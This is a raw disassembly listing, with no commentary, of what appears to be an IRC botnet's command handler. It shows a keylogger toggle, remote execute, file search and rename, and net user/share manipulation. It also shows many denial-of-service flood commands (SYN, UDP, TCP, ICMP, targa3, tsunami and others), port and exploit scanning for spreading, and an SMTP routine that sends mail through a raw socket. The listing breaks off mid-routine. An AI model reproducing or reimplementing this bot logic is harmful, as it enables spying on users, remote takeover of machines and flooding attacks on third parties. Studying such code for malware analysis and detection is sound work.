; --------------------------------------------------------------------------- loc_405EA3: ; CODE XREF: sub_401ACD+4310j push edi push offset aKeylog ; "keylog" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_406020 push [ebp+arg_10] push offset aOn ; "on" call sub_41C070 pop ecx mov edi, offset aFile ; "file" test eax, eax pop ecx jz short loc_405F19 push [ebp+arg_10] push edi call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_405F19 push [ebp+arg_10] push offset aOff ; "off" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_40828C push ebx push 23h call sub_40B2F2 pop ecx cmp eax, ebx pop ecx jle short loc_405F0F push eax push offset dword_42B64C jmp loc_4049EC ; --------------------------------------------------------------------------- loc_405F0F: ; CODE XREF: sub_401ACD+4435j push offset dword_42B620 jmp loc_406F05 ; --------------------------------------------------------------------------- loc_405F19: ; CODE XREF: sub_401ACD+4401j ; sub_401ACD+4410j push 23h call sub_40B33F test eax, eax pop ecx jle short loc_405F2F push offset dword_42B600 jmp loc_406F05 ; --------------------------------------------------------------------------- loc_405F2F: ; CODE XREF: sub_401ACD+4456j mov eax, [ebp+arg_4] push [ebp+arg_10] mov [ebp+var_C5C], eax mov eax, [ebp+var_4] push edi mov [ebp+var_BD4], eax call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_405F5C mov [ebp+var_BD0], 1 jmp short loc_405F65 ; --------------------------------------------------------------------------- loc_405F5C: ; CODE XREF: sub_401ACD+4481j mov eax, [ebp+var_8] mov [ebp+var_BD0], eax loc_405F65: ; CODE XREF: sub_401ACD+448Dj mov esi, [ebp+esi+var_88] cmp esi, ebx jnz short loc_405F8C mov esi, offset aF_0 ; "#f" push offset byte_43D808 push esi call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_405F8C mov esi, [ebp+var_88] loc_405F8C: ; CODE XREF: sub_401ACD+44A1j ; sub_401ACD+44B7j push esi lea eax, [ebp+var_C54] push 80h push eax call sub_41B980 add esp, 0Ch lea eax, [ebp+var_2C4] push offset dword_42B5DC push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 23h push eax call sub_40B0F7 add esp, 14h mov [ebp+var_C58], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_C5C] push ebx push eax push offset sub_411CF5 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_C58] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_40600F loc_405FF9: ; CODE XREF: sub_401ACD+4540j cmp [ebp+var_BCC], ebx jnz loc_40828C push 32h call dword_427078 ; Sleep jmp short loc_405FF9 ; --------------------------------------------------------------------------- loc_40600F: ; CODE XREF: sub_401ACD+452Aj call dword_42708C ; RtlGetLastWin32Error push eax push offset dword_42B5A0 jmp loc_4049EC ; --------------------------------------------------------------------------- loc_406020: ; CODE XREF: sub_401ACD+43E5j push edi push offset aNet ; "net" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_406270 cmp ds:dword_4CB724, ebx jz short loc_40604F cmp ds:dword_4CB74C, ebx jz short loc_40604F push offset unk_42B564 jmp loc_4085D6 ; --------------------------------------------------------------------------- loc_40604F: ; CODE XREF: sub_401ACD+456Ej ; sub_401ACD+4576j cmp [ebp+var_C], ebx jz loc_406CDF mov edi, [ebp+esi+var_88] mov [ebp+arg_0], ebx cmp edi, ebx jz short loc_406074 push edi push [ebp+var_C] call sub_41B900 pop ecx mov [ebp+arg_0], eax pop ecx loc_406074: ; CODE XREF: sub_401ACD+4597j push [ebp+arg_10] push offset aStart ; "start" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_4060C1 cmp edi, ebx jz short loc_406095 push [ebp+arg_0] push 3 jmp loc_406127 ; --------------------------------------------------------------------------- loc_406095: ; CODE XREF: sub_401ACD+45BCj push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_41895C add esp, 0Ch test eax, eax jz short loc_4060B7 push offset unk_42B538 jmp loc_4085D6 ; --------------------------------------------------------------------------- loc_4060B7: ; CODE XREF: sub_401ACD+45DEj push offset unk_42B518 jmp loc_4085D6 ; --------------------------------------------------------------------------- loc_4060C1: ; CODE XREF: sub_401ACD+45B8j push [ebp+arg_10] push offset aStop ; "stop" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_4060DB push [ebp+arg_0] push 4 jmp short loc_406127 ; --------------------------------------------------------------------------- loc_4060DB: ; CODE XREF: sub_401ACD+4605j push [ebp+arg_10] push offset aPause ; "pause" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_4060F5 push [ebp+arg_0] push 5 jmp short loc_406127 ; --------------------------------------------------------------------------- loc_4060F5: ; CODE XREF: sub_401ACD+461Fj push [ebp+arg_10] push offset aContinue ; "continue" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40610F push [ebp+arg_0] push 6 jmp short loc_406127 ; --------------------------------------------------------------------------- loc_40610F: ; CODE XREF: sub_401ACD+4639j push [ebp+arg_10] push offset aDelete ; "delete" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_406139 push [ebp+arg_0] push 1 loc_406127: ; CODE XREF: sub_401ACD+45C3j ; sub_401ACD+460Cj ... call sub_4186C2 pop ecx pop ecx loc_40612E: ; CODE XREF: sub_401ACD+46A2j ; sub_401ACD+472Aj ... push eax push offset aS_2 ; "%s" jmp loc_406CD0 ; --------------------------------------------------------------------------- loc_406139: ; CODE XREF: sub_401ACD+4653j push [ebp+arg_10] push offset aShare ; "share" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40619E cmp edi, ebx jz short loc_406171 cmp [ebp+var_8FC], bl jz short loc_40615E push ebx push edi push 1 jmp short loc_406167 ; --------------------------------------------------------------------------- loc_40615E: ; CODE XREF: sub_401ACD+4689j push [ebp+esi+var_84] push edi push ebx loc_406167: ; CODE XREF: sub_401ACD+468Fj call sub_418A99 add esp, 0Ch jmp short loc_40612E ; --------------------------------------------------------------------------- loc_406171: ; CODE XREF: sub_401ACD+4681j push ebx push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_418C8F add esp, 10h test eax, eax jz short loc_406194 push offset unk_42B4D0 jmp loc_4085D6 ; --------------------------------------------------------------------------- loc_406194: ; CODE XREF: sub_401ACD+46BBj push offset unk_42B4B0 jmp loc_4085D6 ; --------------------------------------------------------------------------- loc_40619E: ; CODE XREF: sub_401ACD+467Dj push [ebp+arg_10] push offset aUser ; "user" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_406229 cmp edi, ebx jz short loc_4061FC cmp [ebp+var_8FC], bl jz short loc_4061CF push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] push ebx push edi push 1 jmp short loc_4061EF ; --------------------------------------------------------------------------- loc_4061CF: ; CODE XREF: sub_401ACD+46EEj push [ebp+var_4] mov esi, [ebp+esi+var_84] cmp esi, ebx push [ebp+var_88] push [ebp+arg_4] jz short loc_4061EB push esi push edi push ebx jmp short loc_4061EF ; --------------------------------------------------------------------------- loc_4061EB: ; CODE XREF: sub_401ACD+4717j push ebx push edi push 2 loc_4061EF: ; CODE XREF: sub_401ACD+4700j ; sub_401ACD+471Cj call sub_418DB0 add esp, 18h jmp loc_40612E ; --------------------------------------------------------------------------- loc_4061FC: ; CODE XREF: sub_401ACD+46E6j push ebx push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_4192E0 add esp, 10h test eax, eax jz short loc_40621F push offset unk_42B490 jmp loc_4085D6 ; --------------------------------------------------------------------------- loc_40621F: ; CODE XREF: sub_401ACD+4746j push offset unk_42B470 jmp loc_4085D6 ; --------------------------------------------------------------------------- loc_406229: ; CODE XREF: sub_401ACD+46E2j push [ebp+arg_10] push offset aSend ; "send" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_406266 cmp edi, ebx jz short loc_40625C push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] push [ebp+arg_0] call sub_419594 add esp, 10h jmp loc_40612E ; --------------------------------------------------------------------------- loc_40625C: ; CODE XREF: sub_401ACD+4771j push offset unk_42B444 jmp loc_4085D6 ; --------------------------------------------------------------------------- loc_406266: ; CODE XREF: sub_401ACD+476Dj push offset unk_42B428 jmp loc_4085D6 ; --------------------------------------------------------------------------- loc_406270: ; CODE XREF: sub_401ACD+4562j push edi push offset aCapture ; "capture" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408DFE push edi push offset aCap ; "cap" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408DFE push edi push offset aGethost ; "gethost" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408D0A push edi push offset aGh ; "gh" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408D0A loc_4062C4: ; CODE XREF: sub_401ACD+3CBEj ; sub_401ACD+3CEDj ... mov edi, [ebp+esi+var_88] cmp edi, ebx mov [ebp+arg_1C], edi jz loc_401E94 push [ebp+arg_8] push offset aKilllog ; "killlog" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408CF0 push [ebp+arg_8] push offset aKl ; "kl" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408CF0 push [ebp+arg_8] push offset aAddalias ; "addalias" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408CAD push [ebp+arg_8] push offset aAa ; "aa" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408CAD push [ebp+arg_8] push offset aPrivmsg_0 ; "privmsg" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408C58 push [ebp+arg_8] push offset dword_42BC00 call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408C58 push [ebp+arg_8] push offset aAction ; "action" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408BEB push [ebp+arg_8] push offset aA ; "a" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408BEB push [ebp+arg_8] push offset aCycle ; "cycle" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408B87 push [ebp+arg_8] push offset aCy ; "cy" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408B87 push [ebp+arg_8] push offset aMode ; "mode" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408B4B push [ebp+arg_8] push offset aM ; "m" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408B4B push [ebp+arg_8] push offset aC_raw ; "c_raw" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408ADC push [ebp+arg_8] push offset aC_r ; "c_r" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408ADC push [ebp+arg_8] push offset aC_mode ; "c_mode" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408A56 push [ebp+arg_8] push offset aC_m ; "c_m" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408A56 push [ebp+arg_8] push offset aC_nick ; "c_nick" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4089E6 push [ebp+arg_8] push offset aC_n ; "c_n" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4089E6 push [ebp+arg_8] push offset aC_join ; "c_join" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4089C0 push [ebp+arg_8] push offset aC_j ; "c_j" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4089C0 push [ebp+arg_8] push offset aC_part ; "c_part" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40895C push [ebp+arg_8] push offset aC_p ; "c_p" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40895C push [ebp+arg_8] push offset aTarga3 ; "targa3" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408887 push [ebp+arg_8] push offset aT3 ; "t3" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408887 push [ebp+arg_8] push offset aTsunami ; "tsunami" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40878C push [ebp+arg_8] push offset aTsn ; "tsn" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40878C push [ebp+arg_8] push offset aRepeat ; "repeat" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408688 push [ebp+arg_8] push offset aRp ; "rp" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408688 push [ebp+arg_8] push offset aDelay ; "delay" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4085E9 push [ebp+arg_8] push offset aDe ; "de" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4085E9 push [ebp+arg_8] push offset aJpDe10 ; "jp]de10" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408458 push [ebp+arg_8] push offset aJp10 ; "jp]10" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408458 push [ebp+arg_8] push offset aExecute ; "execute" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4083C5 push [ebp+arg_8] push offset aE ; "e" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4083C5 push [ebp+arg_8] push offset aFindfile ; "findfile" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4082B6 push [ebp+arg_8] push offset aFf ; "ff" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4082B6 push [ebp+arg_8] push offset aRename ; "rename" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40823F push [ebp+arg_8] push offset aMv ; "mv" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40823F push [ebp+arg_8] push offset aIcmpflood ; "icmpflood" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408142 push [ebp+arg_8] push offset aIcmp ; "icmp" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_408142 mov eax, [ebp+esi+var_84] cmp eax, ebx mov [ebp+arg_0], eax jz loc_401E94 push [ebp+arg_8] push offset aClone_0 ; "clone" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40805A push [ebp+arg_8] push offset aC ; "c" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40805A push [ebp+arg_8] push offset aDdos_syn ; "ddos.syn" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407F61 push [ebp+arg_8] push offset aDdos_ack ; "ddos.ack" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407F61 push [ebp+arg_8] push offset aDdos_random ; "ddos.random" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407F61 push [ebp+arg_8] push offset aWisdom_udp ; "wisdom.udp" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_4067D7 push 7Fh lea eax, [ebp+var_327C] pop esi push esi push [ebp+arg_10] push eax call sub_41B5F0 push esi lea eax, [ebp+var_31FC] push edi push eax call sub_41B5F0 push esi lea eax, [ebp+var_317C] push [ebp+arg_0] push eax call sub_41B5F0 push esi lea eax, [ebp+var_30FC] push [ebp+var_88] push eax call sub_41B5F0 mov eax, [ebp+var_8] mov edi, [ebp+var_4] mov esi, [ebp+arg_4] mov [ebp+var_3074], eax push ebx lea eax, [ebp+var_2C4] push 13h push eax mov [ebp+var_3078], edi mov [ebp+var_3280], esi call sub_40B0F7 add esp, 3Ch mov [ebp+var_307C], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_3280] push ebx push eax push offset sub_4146CF push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_307C] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_4067C6 loc_4067B0: ; CODE XREF: sub_401ACD+4CF7j cmp [ebp+var_3070], ebx jnz loc_403DA1 push 32h call dword_427078 ; Sleep jmp short loc_4067B0 ; --------------------------------------------------------------------------- loc_4067C6: ; CODE XREF: sub_401ACD+4CE1j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42B29C jmp loc_403D92 ; --------------------------------------------------------------------------- loc_4067D7: ; CODE XREF: sub_401ACD+4C37j push [ebp+arg_8] push offset aSynflood ; "synflood" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407E79 push [ebp+arg_8] push offset aSyn ; "syn" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407E79 push [ebp+arg_8] push offset aSkysyn ; "skysyn" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_406904 push 7Fh lea eax, [ebp+var_36A4] pop esi push esi push [ebp+arg_10] push eax call sub_41B5F0 push esi lea eax, [ebp+var_3624] push edi push eax call sub_41B5F0 push esi lea eax, [ebp+var_35A4] push [ebp+arg_0] push eax call sub_41B5F0 push esi lea eax, [ebp+var_3524] push [ebp+var_88] push eax call sub_41B5F0 mov eax, [ebp+var_4] add esp, 30h mov esi, [ebp+arg_4] mov [ebp+var_34A0], eax push [ebp+arg_0] mov eax, [ebp+var_8] mov [ebp+var_349C], eax lea eax, [ebp+var_2C4] push edi mov [ebp+var_36A8], esi push [ebp+arg_10] push offset dword_42B254 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 10h push eax call sub_40B0F7 add esp, 20h mov [ebp+var_34A4], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_36A8] push ebx push eax push offset sub_413627 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_34A4] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_4068F3 loc_4068DD: ; CODE XREF: sub_401ACD+4E24j cmp [ebp+var_3498], ebx jnz loc_407279 push 32h call dword_427078 ; Sleep jmp short loc_4068DD ; --------------------------------------------------------------------------- loc_4068F3: ; CODE XREF: sub_401ACD+4E0Ej call dword_42708C ; RtlGetLastWin32Error push eax push offset dword_42B218 jmp loc_40726A ; --------------------------------------------------------------------------- loc_406904: ; CODE XREF: sub_401ACD+4D49j push [ebp+arg_8] push offset aPhatwonk ; "phatwonk" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407D91 push [ebp+arg_8] push offset aWonk ; "wonk" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407D91 push [ebp+arg_8] push offset aJpldg10 ; "jpldg10" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407C53 push [ebp+arg_8] push offset aJpl10 ; "jpl10" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407C53 push [ebp+arg_8] push offset aRedirect ; "redirect" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407B56 push [ebp+arg_8] push offset aRd ; "rd" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407B56 push [ebp+arg_8] push offset aScan ; "scan" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407A63 push [ebp+arg_8] push offset aSc ; "sc" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407A63 push [ebp+arg_8] push offset aC_privmsg ; "c_privmsg" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40795E push [ebp+arg_8] push offset aC_pm ; "c_pm" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40795E push [ebp+arg_8] push offset aC_action ; "c_action" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407866 push [ebp+arg_8] push offset aC_a ; "c_a" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407866 mov eax, [ebp+esi+var_80] cmp eax, ebx mov [ebp+arg_18], eax jz loc_401E94 push [ebp+arg_8] push offset aPortscan ; "portscan" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407760 push [ebp+arg_8] push offset aPsc ; "psc" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407760 push [ebp+arg_8] push offset aAdvscan ; "advscan" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407299 push [ebp+arg_8] push offset aAdv ; "adv" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407299 push [ebp+arg_8] push offset aUdpflood ; "udpflood" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407150 push [ebp+arg_8] push offset aUdp ; "udp" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407150 push [ebp+arg_8] push offset aU ; "u" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407150 push [ebp+arg_8] push offset aNetsend ; "netsend" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407042 push [ebp+arg_8] push offset aNs ; "ns" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_407042 push [ebp+arg_8] push offset aPingflood ; "pingflood" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_406F18 push [ebp+arg_8] push offset aPing_0 ; "ping" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_406F18 push [ebp+arg_8] push offset aP ; "p" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_406F18 push [ebp+arg_8] push offset aTcpflood ; "tcpflood" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_406D6F push [ebp+arg_8] push offset aTcp ; "tcp" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_406D6F push [ebp+arg_8] push offset aEmail ; "email" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_406D17 push [ebp+arg_10] lea eax, [ebp+var_47EC] push eax call sub_41BEB0 push edi call sub_41B779 push [ebp+arg_0] mov [ebp+arg_10], eax lea eax, [ebp+var_4188] push eax call sub_41BEB0 push [ebp+arg_18] lea eax, [ebp+var_4588] push eax call sub_41BEB0 push offset asc_42D128 ; " " push offset dword_42BBFC push [ebp+esi+var_7C] call sub_417EEF push eax lea eax, [ebp+var_4288] push eax call sub_41BEB0 add esp, 30h lea eax, [ebp+var_5588] push eax push 101h call ds:dword_4CB5C4 ; WSAStartup lea eax, [ebp+var_47EC] push eax call ds:dword_4CB6D8 ; gethostbyname push 6 push 1 push 2 mov edi, eax call ds:dword_4CB6D4 ; socket push [ebp+arg_10] mov esi, eax mov [ebp+var_31C], 2 mov eax, [edi+0Ch] mov eax, [eax] mov eax, [eax] mov [ebp+var_318], eax call ds:dword_4CB654 ; htons mov [ebp+var_31A], ax lea eax, [ebp+var_4288] push eax lea eax, [ebp+var_4188] push eax lea eax, [ebp+var_4288] push eax lea eax, [ebp+var_4588] push eax lea eax, [ebp+var_4188] push eax lea eax, [ebp+var_5988] push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "... push eax call sub_41B886 add esp, 1Ch lea eax, [ebp+var_31C] push 10h push eax push esi call ds:dword_4CB5FC ; connect mov edi, 100h push ebx lea eax, [ebp+var_4088] push edi push eax push esi call ds:dword_4CB66C ; recv lea eax, [ebp+var_4088] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_5988] push eax push esi call ds:dword_4CB6A4 ; send push ebx lea eax, [ebp+var_4088] push edi push eax push esi call ds:dword_4CB66C ; recv push esi call ds:dword_4CB6EC ; closesocket call ds:dword_4CB5AC ; WSACleanup lea eax, [ebp+var_4588] push eax push offset unk_42B0D8 loc_406CD0: ; CODE XREF: sub_401ACD+2E83j ; sub_401ACD+4667j ... lea eax, [ebp+var_2C4] push eax call sub_41B886 loc_406CDC: ; CODE XREF: sub_401ACD+248Cj add esp, 0Ch loc_406CDF: ; CODE XREF: sub_401ACD+4585j ; sub_401ACD+6654j ... cmp [ebp+var_8], ebx jnz short loc_406D00 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h loc_406D00: ; CODE XREF: sub_401ACD+29B3j ; sub_401ACD+2A06j ... mov esi, [ebp+arg_24] loc_406D03: ; CODE XREF: sub_401ACD+68F3j ; sub_401ACD+78E3j ... lea eax, [ebp+var_2C4] push eax call sub_4151AD pop ecx mov eax, esi jmp loc_401E97 ; --------------------------------------------------------------------------- loc_406D17: ; CODE XREF: sub_401ACD+50ADj push [ebp+arg_8] push offset aHttpcon ; "httpcon" call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_406D41 push [ebp+arg_8] push offset aHcon ; "hcon" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_4072E9 loc_406D41: ; CODE XREF: sub_401ACD+525Bj push [ebp+esi+var_7C] push [ebp+arg_18] push [ebp+arg_0] push edi call sub_41B779 pop ecx push eax push [ebp+arg_10] push [ebp+var_8] push [ebp+var_4] push [ebp+var_88] push [ebp+arg_4] call sub_4100DC jmp loc_4040AB ; --------------------------------------------------------------------------- loc_406D6F: ; CODE XREF: sub_401ACD+507Fj ; sub_401ACD+5096j push [ebp+arg_10] mov esi, 80h lea eax, [ebp+var_1354] push esi push eax call sub_41B980 lea eax, [ebp+var_1354] push eax push offset aSyn ; "syn" call sub_41C070 add esp, 14h test eax, eax jz short loc_406DD4 lea eax, [ebp+var_1354] push eax push offset aAck ; "ack" call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_406DD4 lea eax, [ebp+var_1354] push eax push offset aRandom_0 ; "random" call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_406DD4 push offset unk_42B090 jmp loc_406F05 ; --------------------------------------------------------------------------- loc_406DD4: ; CODE XREF: sub_401ACD+52CDj ; sub_401ACD+52E4j ... push [ebp+arg_18] call sub_41B779 cmp eax, ebx pop ecx mov [ebp+var_124C], eax jle loc_406F00 push [ebp+arg_10] lea eax, [ebp+var_1354] push esi push eax call sub_41B980 add esp, 0Ch lea eax, [ebp+var_13D4] push edi push esi push eax call sub_41B980 push [ebp+arg_0] call sub_41B779 mov [ebp+var_1250], eax add esp, 10h xor eax, eax cmp [ebp+var_8EE], bl push [ebp+var_88] setnz al mov [ebp+var_1248], eax mov eax, [ebp+arg_4] mov [ebp+var_13D8], eax lea eax, [ebp+var_12D4] push esi push eax call sub_41B980 mov eax, [ebp+var_4] add esp, 0Ch cmp [ebp+var_1248], ebx mov [ebp+var_1244], eax mov eax, [ebp+var_8] mov [ebp+var_1240], eax mov eax, offset aSpoofed ; "Spoofed" jnz short loc_406E71 mov eax, offset aNormal ; "Normal" loc_406E71: ; CODE XREF: sub_401ACD+539Dj push [ebp+arg_18] push [ebp+arg_0] push edi push [ebp+arg_10] push eax push offset unk_42B04C lea eax, [ebp+var_2C4] push 200h push eax call sub_41B980 push ebx lea eax, [ebp+var_2C4] push 14h push eax call sub_40B0F7 add esp, 2Ch mov [ebp+var_1254], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_13D8] push ebx push eax push offset sub_413E36 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_1254] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_406EEF loc_406ED9: ; CODE XREF: sub_401ACD+5420j cmp [ebp+var_123C], ebx jnz loc_40828C push 32h call dword_427078 ; Sleep jmp short loc_406ED9 ; --------------------------------------------------------------------------- loc_406EEF: ; CODE XREF: sub_401ACD+540Aj call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42B014 jmp loc_4049EC ; --------------------------------------------------------------------------- loc_406F00: ; CODE XREF: sub_401ACD+5318j push offset unk_42AFDC loc_406F05: ; CODE XREF: sub_401ACD+2019j ; sub_401ACD+202Fj ... lea eax, [ebp+var_2C4] push eax call sub_41B886 pop ecx pop ecx jmp loc_40828C ; --------------------------------------------------------------------------- loc_406F18: ; CODE XREF: sub_401ACD+503Aj ; sub_401ACD+5051j ... cmp ds:dword_4CB744, ebx jnz loc_407027 mov eax, [ebp+var_8] push 7Fh push [ebp+arg_10] mov [ebp+var_FF4], eax mov eax, [ebp+var_4] mov [ebp+var_FF8], eax lea eax, [ebp+var_108C] push eax call sub_41B5F0 push edi call sub_41B779 push [ebp+arg_0] mov [ebp+var_100C], eax call sub_41B779 push [ebp+arg_18] mov [ebp+var_1008], eax call sub_41B779 push 7Fh mov [ebp+var_1004], eax push [ebp+var_88] lea eax, [ebp+var_110C] push eax call sub_41B5F0 mov eax, [ebp+arg_4] add esp, 24h mov [ebp+var_1110], eax lea eax, [ebp+var_108C] push [ebp+var_1004] push [ebp+var_1008] push eax lea eax, [ebp+var_2C4] push [ebp+var_100C] push offset unk_42AF94 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 16h push eax call sub_40B0F7 add esp, 24h mov [ebp+var_FFC], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_1110] push ebx push eax push offset sub_413285 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_FFC] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_407016 loc_407000: ; CODE XREF: sub_401ACD+5547j cmp [ebp+var_FF0], ebx jnz loc_40828C push 32h call dword_427078 ; Sleep jmp short loc_407000 ; --------------------------------------------------------------------------- loc_407016: ; CODE XREF: sub_401ACD+5531j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42AF5C jmp loc_4049EC ; --------------------------------------------------------------------------- loc_407027: ; CODE XREF: sub_401ACD+5451j push 1FFh lea eax, [ebp+var_2C4] push offset aIcmp_dllNotAva ; "ICMP.dll not available" push eax call sub_41B5F0 jmp loc_408289 ; --------------------------------------------------------------------------- loc_407042: ; CODE XREF: sub_401ACD+500Cj ; sub_401ACD+5023j push edi lea eax, [ebp+var_2C4] push [ebp+arg_10] push [ebp+arg_0] push offset unk_42AF08 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 push [ebp+arg_0] call sub_41AFE0 mov edx, eax push edi mov edi, edx call sub_41AFE0 push [ebp+arg_10] add edi, eax call sub_41AFE0 push [ebp+arg_8] add edi, eax call sub_41AFE0 add eax, [ebp+var_C] push [ebp+arg_18] lea eax, [eax+edi+7] push eax call sub_41B900 add esp, 40h mov [ebp+arg_C], eax push [ebp+arg_0] call sub_41B779 mov edi, [ebp+arg_1C] cmp eax, ebx pop ecx mov [ebp+arg_14], eax mov [ebp+arg_20], ebx jle short loc_40713C loc_4070C5: ; CODE XREF: sub_401ACD+561Cj push [ebp+arg_C] push edi push [ebp+arg_10] call sub_4185A5 add esp, 0Ch cmp eax, 1 mov [ebp+arg_1C], eax jz short loc_4070ED cmp eax, ebx jnz short loc_40710C inc [ebp+arg_20] mov eax, [ebp+arg_20] cmp eax, [ebp+arg_14] jl short loc_4070C5 jmp short loc_407145 ; 